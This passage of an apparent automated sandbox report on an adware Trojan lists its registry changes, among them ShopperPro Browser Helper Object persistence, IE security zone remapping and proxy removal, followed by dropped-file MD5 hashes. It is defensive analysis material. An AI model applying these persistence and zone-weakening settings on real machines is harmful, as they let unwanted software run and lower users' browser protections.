[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 14 D9 41 FA 9F EF F0 15 E5 86 FB 85 31 55 E7"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process %original file name%.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 35 01 5E B1 44 EA A6 72 18 E3 87 E9 B7 57 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C D4 5A C6 DF F6 31 AB DC 89 B0 C7 E5 D1 C3 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 55 41 58 ED 9D 29 7F 16 08 ED 20 6B 76 E0 D9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 7C 30 10 16 74 2F EE 57 B0 A6 D5 79 54 4F A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE DC F0 77 B0 F4 18 B7 3C 37 F8 3E 22 3F 8F AB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BROWSE~2.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 6E 31 4B B4 2D 40 5A 51 08 F1 11 F8 34 46 22"

Dropped PE files

MD5	File path
13d52d377c7cdfe6d20a31e02b9ed364	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro.dll
0022a7b53b72f781841e0d2eeb323ed8	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro64.dll
05c47da12b0009bd98653f51287f7768	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_25149\bxsdk32.dll
fa77a2a7762cb2a5b5af8950dbd30e87	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_25149\ins_geforce.exe
6fd861aedfb4d30c3d984560433f74a5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_25149\ins_sense.exe
1af5b44d8d4f63f1a2db7e63dd4da19f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_25149\ins_shopperpro.exe
4896a79dc5d7d13664d44323a0347a75	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsfD.tmp\AccDownload.dll
a436db0c473a087eb61ff5c53c34ba27	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsfD.tmp\System.dll
faa7f034b38e729a983965c04cc70fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsfD.tmp\nsProcess.dll
4896a79dc5d7d13664d44323a0347a75	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm6.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm6.tmp\nsProcess.dll
904beebec2790ee2ca0c90fc448ac7e0	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoB.tmp\D1958.dll
4cee241eee71dd1f6f67d288b261a9c2	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoB.tmp\setup.exe
9c04ff058b8a36fe587c7794f26ceb32	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_a
3141c4474eeb697b1a18afd57e2a5873	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_a
cf9b0ee86ff7318d96bd170c1957d074	c:\Program Files\Common Files\System\SysMenu.dll
d76e37e6696ccb8c8cc90cc0979e0f76	c:\Program Files\Ge-Force\Uninstall.exe
9b405fa63d0643a41a2b97f505cb132b	c:\Program Files\Ge-Force\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.exe
5490d4e338b6790295c5bbb69a4bb39d	c:\Program Files\Ge-Force\utils.exe
1a59ab76218b0f595ce56326307ffc12	c:\Program Files\Sense\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.exe
2c20406badff01ee6c35646a9fe05226	c:\Program Files\Sense\Uninstall.exe
625c74baae2bfcb85e78a74281e83042	c:\Program Files\Sense\utils.exe
d1c3c1bcf54f33cfed3978a6ef492cea	c:\Program Files\ShopperPro\JSDriver\jsdrv.exe
12a881cc4928aeab727ac46669a92512	c:\Program Files\ShopperPro\JSDriver\jsdrv.sys
7871981d984564fd54ed7a4ec48c63ad	c:\Program Files\ShopperPro\SPRemove.exe
13d52d377c7cdfe6d20a31e02b9ed364	c:\Program Files\ShopperPro\ShopperPro.dll
109d70abe370fd63ab996a56d51ada24	c:\Program Files\ShopperPro\ShopperPro.exe
0022a7b53b72f781841e0d2eeb323ed8	c:\Program Files\ShopperPro\ShopperPro64.dll
f88305d5869eace5ca17ca8402ba1b68	c:\Program Files\ShopperPro\Updater.exe
45960b40c1ecb75ed5549a80049879e1	c:\Program Files\YTDownloader\AniGIF.ocx
218200dd10649de5e6d5fd107da9cbf3	c:\Program Files\YTDownloader\BrowserHelper.exe
f10de28eb1e70cda4f0e57fd0c8e15fa	c:\Program Files\YTDownloader\BrowserHelperSrv.exe
e007c946bcccc80ebd628e8030984017	c:\Program Files\YTDownloader\DownloadAPI.dll
eab0838d01932bc658fda3ccf52d3213	c:\Program Files\YTDownloader\DownloadHelper.exe
af2e828eac6658b0e17f223f66153b9b	c:\Program Files\YTDownloader\Unelevate.exe
97c9d0edce6c267aa383ad6a9aa6eb45	c:\Program Files\YTDownloader\Updater.exe
e1df8dd09c9742e8a5052b0d8721c95c	c:\Program Files\YTDownloader\YTDUninstall.exe
